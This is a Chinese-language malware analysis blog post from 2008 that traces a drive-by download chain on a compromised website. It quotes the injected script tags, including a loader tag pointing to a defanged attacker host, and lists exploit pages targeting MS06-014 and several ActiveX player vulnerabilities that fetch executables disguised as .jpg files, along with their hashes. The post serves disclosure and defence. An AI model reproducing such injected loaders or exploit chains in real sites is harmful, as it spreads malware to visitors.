一个挂马Trojan-Downloader.JS.Multi.ax的网站
endurer 原创
2008-03-24 第1版
打开该网站,Kaspersky报告已检测到: 木马程序 Trojan-Downloader.JS.Multi.ax URL: hxxp://ad**.sh**i*t**ip.com/file/ad.js
下载 HttpRead 来进行分析。
首先检查该网站代码,发现:
/---
<script src="../../../ads/iw_t.js"></script>
---/
1、ads/iw_t.js 包含代码:
/---
<script src='/images/jin.gif'></script>
---/
1.1、/images/jin.gif 包含JavaScript脚本文件,功能是:检测Cookie变量my_ad,如果不存在则创建,并输出代码:
/---
<script language="javascript" src="hxxp://ww**.sh**i*t**ip.com/file/my.js"></script>
---/
1.1.1 hxxp://ad**.sh**i*t**ip.com/file/ad.js 输出:
1.1.1.1 hxxp://ww**.sh**i*t**ip.com/file/gdisvc.htm
利用 MS-0614漏洞 下载 hxxp://ww**.sh**i*t**ip.com/file/images/gdisvc.jpg 存为 gdisvc.exe,下载 hxxp://ww**.sh**i*t**ip.com/file/images/top.jpg 存为 top.exe
文件说明符 : D:/test/gdisvc.jpg
属性 : A---
语言 : 中文(中国)
文件版本 : 51.2600.2180
说明 : Microsoft(R) Windows(R) Operating System
版权 : C) Microsoft Corporation. All rights reserved.
备注 : Microsoft(R) Windows(R) Operating System
产品版本 : 51.2600.2180
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : csrss
源文件名 : csrss.exe
创建时间 : 2008-3-24 13:7:47
修改时间 : 2008-3-24 13:7:47
访问时间 : 2008-3-24 13:9:52
大小 : 20992 字节 20.512 KB
MD5 : 7de7e5ff1faa846360223f57046e7931
SHA1: E4E3A23B8153219988F3F43947379A3DA9991B26
CRC32: 813e1f71
文件说明符 : D:/test/top.jpg
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-3-24 13:7:47
修改时间 : 2008-3-24 13:7:47
访问时间 : 2008-3-24 13:8:51
大小 : 26524 字节 25.924 KB
MD5 : c9c9a6bc94a773da9a41df078d65c765
SHA1: BC8076757E1B89BB6AE5603F135FB1A4D0F13835
CRC32: 7471d8eb
1.1.1.2 hxxp://ww**.sh**i*t**ip.com/file/xunlei.htm
利用迅雷(PPlayer.XPPlayer.1)漏洞下载、运行 hxxp://ww**.sh**i*t**ip.com/file/images/gdisvc.jpg
1.1.1.3 hxxp://ww**.sh**i*t**ip.com/file/real.htm
利用RealPlayer(IERPCtl.IERPCtl.1)漏洞下载、运行 hxxp://ww**.sh**i*t**ip.com/file/images/gdisvc.jpg
1.1.1.4 hxxp://ww**.sh**i*t**ip.com/file/lz.htm
利用 联众(GLCHAT.GLChatCtrl.1)漏洞下载、运行hxxp://ww**.sh**i*t**ip.com/file/images/gdisvc.jpg
1.1.1.5 hxxp://ww**.sh**i*t**ip.com/file/bf.htm
利用 暴风影音(MPS.StormPlayer) 漏洞下载、运行hxxp://ww**.sh**i*t**ip.com/file/images/gdisvc.jpg
1.1.1.6 hxxp://ww**.sh**i*t**ip.com/file/pps.htm
利用 PPStream(POWERPLAYER.PowerPlayeCtrl.1) 漏洞下载、运行hxxp://ww**.sh**i*t**ip.com/file/images/gdisvc.jpg
1.1.1.7 hxxp://ww**.sh**i*t**ip.com/file/sdr.htm
利用 超星阅览器 漏洞下载、运行 hxxp://ww**.sh**i*t**ip.com/file/images/gdisvc.jpg